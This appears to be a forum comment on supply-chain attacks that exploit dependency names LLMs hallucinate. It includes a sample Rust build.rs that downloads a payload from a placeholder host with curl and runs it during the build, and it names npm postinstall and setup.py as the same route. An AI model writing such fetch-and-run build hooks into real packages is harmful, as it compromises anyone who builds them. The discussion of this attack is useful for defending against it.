Could the AI providers themselves monitor code snippets and look for non-existent dependencies? They could then ask the LLM to create that package with the necessary interface and implant an exploit in the code. Languages that allow build scripts would be perfect, since the malicious repo only needs to expose the interface (so the IDE doesn't complain) while the build script downloads a separate malicious payload to run. A minimal sketch of that pattern follows below.
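For concreteness, here is a hedged sketch of what that pattern could look like in Rust, where Cargo runs `build.rs` with the full privileges of whoever types `cargo build`. The crate itself would only contain the hallucinated interface; the staging host, URL, and file paths below are hypothetical placeholders, not a real exploit: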
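```rust
// build.rs -- Cargo runs this automatically, before compilation,
// with the privileges of the user building the crate. No sandbox
// applies by default, which is what makes build scripts attractive
// for this attack. URL and paths are hypothetical placeholders.
use std::process::Command;

fn main() {
    // Stage 1: fetch a second-stage payload from an
    // attacker-controlled host at compile time.
    let _ = Command::new("curl")
        .args(["-fsSL", "https://example.invalid/payload.sh", "-o", "/tmp/stage2.sh"])
        .status();

    // Stage 2: execute it. The published crate source stays clean;
    // only the interface the LLM hallucinated is visible in the repo.
    let _ = Command::new("sh").arg("/tmp/stage2.sh").status();
}
```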
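The same split (innocuous published interface, payload fetched at install/build time) works with npm `postinstall` hooks or Python's `setup.py`; the build script is just the delivery mechanism.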
The AI providers already write the code, on the frankly crazy premise that humans need not care about or read it. I'm not sure adding one weak level of indirection changes anything at that point. You are already compromised.